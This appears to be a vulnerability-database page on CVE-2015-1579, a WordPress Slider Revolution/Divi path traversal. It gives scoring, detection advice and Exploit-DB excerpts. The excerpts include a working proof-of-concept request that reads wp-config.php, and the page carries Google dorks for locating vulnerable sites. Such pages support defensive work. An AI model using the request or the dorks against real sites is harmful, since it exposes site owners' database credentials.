CVE-2015-1579
published 2015-02-11CVE-2015-1579: Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img…
PriorityP271medium5CVSS 2.0
AVNACLAuNCPINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
22.05%
97.4th percentile
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
Detection & IOCsextracted from sources · hover to see the quote
sigma↗
matchers: - type: word part: body words: - "'DB_NAME'" - "'DB_PASSWORD'" - "'DB_USER'" condition: and - type: status status: - 200
- →Detect exploitation attempts by monitoring GET requests to wp-admin/admin-ajax.php with the 'action=revslider_show_image' parameter combined with directory traversal sequences (../) in the 'img' parameter. ↗
- →Successful exploitation is confirmed when the HTTP 200 response body contains WordPress database credential strings such as 'DB_NAME', 'DB_PASSWORD', and 'DB_USER' — indicating wp-config.php was disclosed. ↗
- →Use the Google dork 'inurl:/wp-content/plugins/revslider' to identify potentially vulnerable WordPress installations exposed on the internet. ↗
- →The vulnerability is unauthenticated (no WordPress login required); any remote attacker can trigger the traversal via a direct GET request to the admin-ajax.php endpoint. ↗
- ·This CVE may be a duplicate of CVE-2014-9734; the same vulnerable endpoint and traversal technique appear across multiple WordPress themes (Divi, CuckooTap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Striking, Beach Apollo) that bundle the RevSlider plugin, so detections should not be scoped to a single theme. ↗
- ·The affected plugin version is Slider Revolution Responsive <= 4.1.4; detections should be validated against this version ceiling to avoid false positives on patched installations. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rvjj-jxmx-c45g: Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a
ghsa_unreviewed·2022-05-17·CVSS 5.0
CVE-2015-1579 [MEDIUM] CWE-22 GHSA-rvjj-jxmx-c45g: Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
VulnCheck
elegantthemes divi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 5.0
CVE-2015-1579 [MEDIUM] elegantthemes divi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
elegantthemes divi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
Affected: elegantthemes divi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
Exploit PoC: https://vulncheck.com/xdb/6ccdf94b0bd1; https://vulncheck.com/xdb/ad076f4bdf7d
No detection rules found.
Exploit-DB
WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download
exploitdb·2015-03-30
CVE-2015-1579 WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download
WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download
---
# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Link : Premium plugin
# Dork Google: revslider.php "index of"
# Date : 2014-07-24
# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
######################
# Description
Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability
######################
# PoC
http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#####################
Discovered By : Claudio Viviani
Exploit-DB
Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download
exploitdb·2014-09-01
CVE-2015-1579 Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download
Mulitple WordPress Themes - 'admin-ajax.php?img' Arbitrary File Download
---
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: [email protected]
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ul
Nuclei
WordPress Slider Revolution - Local File Disclosure
nuclei·CVSS 5.0
CVE-2015-1579 [MEDIUM] WordPress Slider Revolution - Local File Disclosure
WordPress Slider Revolution - Local File Disclosure
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
Template:
id: CVE-2015-1579
info:
name: WordPress Slider Revolution - Local File Disclosure
author: pussycat0x
severity: medium
description: |
Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
impact: |
An atta
2015-02-11
Published
Exploited in the wild